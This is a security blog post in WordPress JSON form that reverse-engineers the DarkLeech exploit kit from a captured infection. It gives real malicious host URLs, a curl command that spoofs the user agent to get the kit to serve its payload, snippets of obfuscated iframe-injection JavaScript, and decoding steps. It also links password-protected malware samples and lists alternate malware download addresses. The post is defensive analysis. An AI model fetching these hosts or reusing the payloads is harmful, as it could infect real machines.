{"id":460,"date":"2013-09-09T21:58:25","date_gmt":"2013-09-09T21:58:25","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=460"},"modified":"2013-09-26T06:28:08","modified_gmt":"2013-09-26T06:28:08","slug":"reversing-the-darkleech-exploit-kit","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2013\/09\/reversing-the-darkleech-exploit-kit\/","title":{"rendered":"Reversing The DarkLeech Exploit Kit"},"content":{"rendered":"

Hello again loyal readers!<\/p>\n

I have a treat for you. I encountered an exploit kit while doing my malware thing and decided to try and get a better idea of what is going on start to finish.<\/p>\n

I Watched a machine get exploited and fired up WireShark to watch:
\nGET http:\/\/68.178.166.11\/2b01554de28f018745855a41166494db\/lately-duplicate.php HTTP\/1.1
\nAccept: image\/gif, image\/x-xbitmap, image\/jpeg, image\/pjpeg, application\/x-shockwave-flash, application\/x-ms-application, application\/x-ms-xbap, application\/vnd.ms-xpsdocument, application\/xaml+xml, application\/vnd.ms-excel, application\/vnd.ms-powerpoint, application\/msword, (value not set), pronto\/1.00.00, *\/*
\nReferer: http:\/\/www.thaiairwaysusa.com\/
\nAccept-Language: en-us
\nUA-CPU: x86
\nAccept-Encoding: gzip, deflate
\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 1.1.4322; InfoPath.1; MS-RTC LM 8)
\nProxy-Connection: Keep-Alive
\nHost: 68.178.166.11
\nPragma: no-cache<\/p>\n

http:\/\/68.178.166.11\/2b01554de28f018745855a41166494db\/lately-duplicate.php is the infection URL<\/p>\n

First thing you notice is if you try and visit the page with wget or lynx or curl, you get nothing:
\njoe@gironsec:~$ curl http:\/\/68.178.166.11\/2b01554de28f018745855a41166494db\/lately-duplicate.php<\/p>\n

<\/p>\n

\n
<!DOCTYPE HTML PUBLIC "-\/\/IETF\/\/DTD HTML 2.0\/\/EN"><\/span>\r\n<html><head><\/span>\r\n<title><\/span>404 Not Found<\/title><\/span>\r\n<\/head><body><\/span>\r\n<h1><\/span>Not Found<\/h1><\/span>\r\n<p><\/span>The requested URL \/2b01554de28f018745855a41166494db\/lately-duplicate.php was not found on this server.<\/p><\/span>\r\n<hr><\/span>\r\n<address><\/span>Apache\/2.2.8 (Fedora) Server at 68.178.166.11 Port 80<\/address><\/span>\r\n<\/body><\/html><\/span>\r\n<\/pre>\n<\/div>\n
if you’re clever though, you’ll set the user agent string to something like oh i dont know, IE 5 and hope for the best:
\njoe@gironsec:~$ curl –user-agent “Mozilla\/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” http:\/\/68.178.166.11\/2b01554de28f018745855a41166494db\/lately-duplicate.php|less
\nThis returns a java script file.
\nHere is the file:
\ndarkleech_first_js<\/a>
\nOh shoot, its encrypted. But fear not, we can decrypt this easily. How?
\nJust replace the eval function with document.write!
\ndecryptme<\/a>
\nThis produced another javascript file.
\nhere it is prettified:darkleech_decrypted<\/a>
\nthe code is a plugin detector for pdf files.
\nWhat stood out for me was the following:
\n<\/p>\n
\n
 me ");pifr.setAttribute('width', 11);pifr.setAttribute('height', 12);pifr.setAttribute('style', "<\/span>\r\n                            top:<\/span> 100<\/span>px; position:<\/span> absolute ");pifr.setAttribute('src', "<\/span> \/<\/span> 8<\/span>fad735e77b54494234fa5c82e5f4996 \/<\/span> breeding -<\/span> lecture.php ?<\/span> oocSsS =<\/span> 2<\/span>j2e542g53 &<\/span> VMTIP =<\/span> k &<\/span> wuabRuEXEygOen =<\/span> 2<\/span>g55562e312f2j2j3155 &<\/span> bHXKmoLg =<\/span> 2<\/span>d2b2d2b2d2b2d ");document.body.appendChild(pifr);}document.write('');setTimeout(end_redirect,61000);var javaver=window.pdpd.getVersion("<\/span>\r\n<\/pre>\n<\/div>\n
See it?
\nbreeding – lecture.php ? oocSsS = 2j2e542g53 & VMTIP = k & wuabRuEXEygOen = 2g55562e312f2j2j3155 & bHXKmoLg = 2d2b2d2b2d2b2d
\nThese are GET request values.
\nWhen I curl’d the site with these values, it sent me a  file:
\ndarkleech_pdf<\/a>. Since I was being flagged by VirusTotal \/ WebSense, I’ve password protected the PDF file. the password is ‘gironsec’.<\/p>\n
The PDF file (which I didn’t open and neither should you) contained several instances of FlateDecode streams.
\nA FlateDecode stream is a section of a PDF file that contains something embedded inside. I assumed this was the payload:
\n41 0 obj<<\/Length 89\/Filter[\/FlateDecode]\/Type\/EmbeddedFile>>stream
\nH\u2030\u00b2\u00b1\u00af\u00c8\u00cdQ(K-*\u00ce\u00cc\u00cf\u00b3U2\u00d43PRH\u00cdK\u00ceO\u00c9\u00ccK\u00b7U
\nq\u00d3\u00b5P\u00b2\u00b7\u00e3\u00b2\u00a9H)\u00b0\u0002b\u0005\u00a0\u00ea\u00bcb\u0010\u00cbV)\u00a3\u00a4\u00a4\u00c0J_?\u00afX\/1%?)U\/9?W\u001f(\u00a1\u00afd\u0007\u0010`
\nendstream
\nendobj<\/p>\n
Since a FlateStream is just zlib \/ DEFLATE encoding, I used a great little tool http:\/\/blog.didierstevens.com\/programs\/pdf-tools\/ which ran against the pdf and showed me the true payload. More F’ing javascript. Of course its encrypted. Why wouldn’t it be?<\/p>\n
darkleech_pdf_decoded<\/a>
\nThis one was more interesting to decode.
\n<\/p>\n
\n
if<\/span>(yy)xx=<\/span>s[2<\/span>]+<\/span>"\\\\x61"<\/span>;\r\nxx+=<\/span>"\\\\x6c"<\/span>;\r\nif<\/span>(yy){function<\/span> XA(z,a,b){return<\/span> ZA(a,b)};}\r\na=<\/span>[XA(0<\/span>,"7"<\/span>[0<\/span>],"16"<\/span>) etc etc etc\r\n<\/pre>\n<\/div>\n
Broken down, the function does a string combine to form a hex character.<\/p>\n
Do decrypt, we do:
\n<\/p>\n
\n
function<\/span> XA(z,a,b){\r\n\treturn<\/span> parseInt<\/span>(a+<\/span>b[1<\/span>], 16<\/span>)\r\n}\r\na=<\/span>[XA(0<\/span>,"7"<\/span>,"16"<\/span>),XA(0<\/span>,"6"<\/span>,"11"<\/span>),XA(0<\/span>,"7"<\/span>,"12"<\/span>),XA(0<\/span>,"2"<\/span>,"10"<\/span>), etc etc etc\r\n\tdocument<\/span>.write(String<\/span>.fromCharCode.apply(String<\/span>, a));\r\n<\/pre>\n<\/div>\n
The following html file decrypts:
\nDecryptagain<\/a><\/p>\n
This produced another javascript file, this time what i think is the actual exploit.
\nIt is here:
\ndecoded_js_pdf<\/a>
\nSurprise, its encoded!
\nThe shell code, which trying to not look like shellcode is here:
\n(just did a binary paste into ollydbg and disassembled)
\npayload_shellcode_from_pdf<\/a><\/p>\n
That was a crap load of work just to deliver an exploit. Not only that, I think I failed to disassemble \/ decrypt the final stage properly. I swear, the black hats are winning the war. They have more time on their hands. <\/p>\n
All files here:
\ndarkleech_stuff<\/a>
\npassword is ‘lolwut’.<\/p>\n
The PDF exploit is trying to take advantage of this CVE: CVE-2010-0188<\/a>.<\/p>\n
Alt download malware URI in case they took the main one down:<\/p>\n
\r\nGET http:\/\/174.142.235.1\/c032df642295f9d35dee58bb00fd75cd\/paintings-jumping.php HTTP\/1.1::~~Accept: image\/gif, image\/jpeg, image\/pjpeg, image\/pjpeg, application\/vnd.ms-excel, application\/vnd.ms-powerpoint, application\/msword, application\/x-ms-application, application\/x-ms-xbap, application\/vnd.ms-xpsdocument, application\/xaml+xml, *\/*::~~Accept-Language: en-au::~~User-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0; .NET CLR 2.0.50727; InfoPath.2; MS-RTC LM 8; .NET CLR 3.0.4\r\n<\/pre>\n
\r\nGET http:\/\/67.228.244.162\/aa8b7a06fcf440a2dbc0981a2b8837c8\/pointer-exhibits.php HTTP\/1.1::~~Accept: image\/gif, image\/x-xbitmap, image\/jpeg, image\/pjpeg, application\/x-shockwave-flash, application\/x-ms-application, application\/x-ms-xbap, application\/vnd.ms-xpsdocument, application\/xaml+xml, application\/vnd.ms-excel, application\/vnd.ms-powerpoint, application\/msword, *\/*:~~Accept-Language: en-us::~~UA-CPU: x86::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla\/4.0 (compatible; MSIE 7.0;\r\n<\/pre>\n
Stay safe!<\/p>\n
\"Tka3P9j\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Hello again loyal readers! I have a treat for you. I encountered an exploit kit while doing my malware thing and decided to try and get a better idea of what is going on start to finish. I Watched a machine get exploited and fired up WireShark to watch: GET http:\/\/68.178.166.11\/2b01554de28f018745855a41166494db\/lately-duplicate.php HTTP\/1.1 Accept: image\/gif, image\/x-xbitmap, […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/460"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=460"}],"version-history":[{"count":11,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/460\/revisions"}],"predecessor-version":[{"id":521,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/460\/revisions\/521"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=460"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=460"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=460"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}